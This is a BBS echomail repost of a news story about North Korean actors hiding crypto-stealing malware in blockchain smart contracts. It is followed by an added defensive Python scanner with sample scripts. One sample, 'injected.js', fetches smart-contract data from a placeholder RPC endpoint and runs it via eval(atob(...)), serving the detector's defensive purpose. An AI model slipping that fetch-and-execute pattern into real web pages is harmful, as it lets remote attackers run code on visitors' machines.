
Just a sample of the Echomail archive

Cooperative anarchy at its finest, still active today. Darkrealms is the Zone 1 Hub.

   CONSPRCY      How big is your tinfoil hat?      2,445 messages   


   Message 1,856 of 2,445   
   Mike Powell to All   
   North Korean hackers foun   
   19 Oct 25 09:15:12   
   
   TZUTC: -0500   
   MSGID: 1613.consprcy@1:2320/105 2d5a2ebd   
   PID: Synchronet 3.21a-Linux master/123f2d28a Jul 12 2025 GCC 12.2.0   
   TID: SBBSecho 3.28-Linux master/123f2d28a Jul 12 2025 GCC 12.2.0   
   BBSID: CAPCITY2   
   CHRS: ASCII 1   
   FORMAT: flowed   
   North Korean hackers found hiding crypto-stealing malware with Blockchain   
      
   Date:   
   Fri, 17 Oct 2025 16:35:00 +0000   
      
   Description:   
   State-sponsored actors are using Ethereum and BNB to host malware and steal   
   people's money.   
      
   FULL STORY   
      
   North Korean state-sponsored threat actors are now using public blockchains    
   to host malicious code and deploy malware on target endpoints.    
      
   This is according to Google's Threat Intelligence Group (GTIG), who said they
   observed UNC5342 using Ethereum and BNB to host droppers and ultimately    
   deploy cryptocurrency-stealing malware against software and blockchain   
   developers.    
      
   The technique is called EtherHiding. Instead of sending a malicious file   
   directly to the victim (or otherwise tricking them into downloading it), they   
   encode parts of the malware into blockchain transactions and smart contracts.   
      
   Evolution of bulletproof hosting    
      
   The smart contract itself doesn't execute malware automatically on someone's
   computer, but it can deliver instructions or code when a user interacts with   
   it (when they click a link, run a script, or connect a crypto wallet).    
      
   The blockchain is a great place to store and distribute malware since it is   
   public, immutable, and almost impossible to tamper with.
      
   This represents a shift toward next-generation bulletproof hosting, Google   
   said, stressing that the blockchain's resilient nature is what makes it so
   enticing for cybercrooks.    
      
   From February, UNC5342 was observed creating fake jobs and coding challenges,
   tricking developers and others working in the Web3 space to download
   different files. These files connect to the blockchain and retrieve the code   
   which, in turn, installs the JadeSnow loader. This loader drops the   
   InvisibleFerret backdoor, which was already observed being used in cryptocurrency
   thefts.    
      
   This is not the first time we're seeing blockchain being used to deliver
   malware. The technique has been in use since 2023, and in the same report,   
   Google also mentioned a financially motivated actor UNC5142 using the same   
   technique.    
      
   This group was seen compromising WordPress sites to host malicious JavaScript   
   code that connected to the blockchain. More than 14,000 infected sites were   
   found so far.    
      
   North Korea is known for targeting the crypto industry and using the stolen   
   funds to finance its weapons program and state apparatus.    
      
    Via The Record    
      
   ======================================================================   
   Link to news story:   
   https://www.techradar.com/pro/security/north-korean-hackers-found-hiding-crypto-stealing-malware-with-blockchain
      
   $$   
   --- SBBSecho 3.28-Linux   
    * Origin: capitolcityonline.net * Telnet/SSH:2022/HTTP (1:2320/105)   
   SEEN-BY: 105/81 106/201 128/187 129/14 305 153/7715 154/110 218/700   
   SEEN-BY: 226/30 227/114 229/110 111 206 300 307 317 400 426 428 470   
   SEEN-BY: 229/664 700 705 266/512 291/111 320/219 322/757 342/200 396/45   
   SEEN-BY: 460/58 633/280 712/848 902/26 2320/0 105 304 3634/12 5075/35   
   PATH: 2320/105 229/426   
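
A defender-side heuristic for the pattern the story describes (a script reads data from a smart contract, then runs what it got back), as an added example that is not part of the original message or of Google's report. The regexes, verdict names and sample scripts are assumptions constructed for illustration; `RPC_URL` and the all-zero address are placeholders.

```python
import re

# Signals are assumptions chosen for this example, not published indicators.
RPC_READ = re.compile(r"""["']eth_(?:call|getStorageAt)["']""")  # read-only JSON-RPC
CONTRACT_ADDR = re.compile(r"\b0x[0-9a-fA-F]{40}\b")              # 20-byte address
DYNAMIC_EXEC = re.compile(r"\beval\s*\(|\bFunction\s*\(")         # string run as code
DECODE = re.compile(r"\batob\s*\(|fromCharCode|TextDecoder")      # payload decoding

def score_script(source):
    """Report which signals fire in one JavaScript source and give a verdict."""
    signals = {
        "rpc_read": bool(RPC_READ.search(source)),
        "contract_addr": bool(CONTRACT_ADDR.search(source)),
        "dynamic_exec": bool(DYNAMIC_EXEC.search(source)),
        "decode": bool(DECODE.search(source)),
    }
    reads_chain = signals["rpc_read"] and signals["contract_addr"]
    if reads_chain and signals["dynamic_exec"]:
        verdict = "suspicious"   # chain data can reach an execution sink
    elif reads_chain:
        verdict = "review"       # legitimate dapps also read contracts
    else:
        verdict = "ignore"       # out of scope for this particular check
    return {"signals": signals, "verdict": verdict}

ADDR = "0x" + "0" * 39 + "1"     # placeholder address, not a real contract

# Constructed, non-functional sample scripts (not taken from any real site).
_TEMPLATES = {
    "wallet_balance.js": """fetch(RPC_URL, {method: "POST", body: JSON.stringify(
        {jsonrpc: "2.0", id: 1, method: "eth_call",
         params: [{to: "__ADDR__", data: "0x70a08231"}, "latest"]})})
      .then(r => r.json()).then(j => show(parseInt(j.result, 16)));""",
    "legacy_eval.js": """var cfg = eval("(" + el.textContent + ")");""",
    "injected.js": """fetch(RPC_URL, {method: "POST", body: JSON.stringify(
        {method: "eth_call", params: [{to: "__ADDR__", data: "0x00000000"}]})})
      .then(r => r.json()).then(j => eval(atob(j.result)));""",
}
SAMPLES = {n: s.replace("__ADDR__", ADDR) for n, s in _TEMPLATES.items()}

def scan(samples):
    """Map each script name to its verdict."""
    return {name: score_script(src)["verdict"] for name, src in samples.items()}

if __name__ == "__main__":
    for name, verdict in scan(SAMPLES).items():
        print(f"{verdict:10} {name}")
```

A "review" result is expected for ordinary Web3 front ends; only the combination with a dynamic execution sink is escalated, and obfuscated scripts can evade string matching entirely.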
      



(c) 1994,  bbs@darkrealms.ca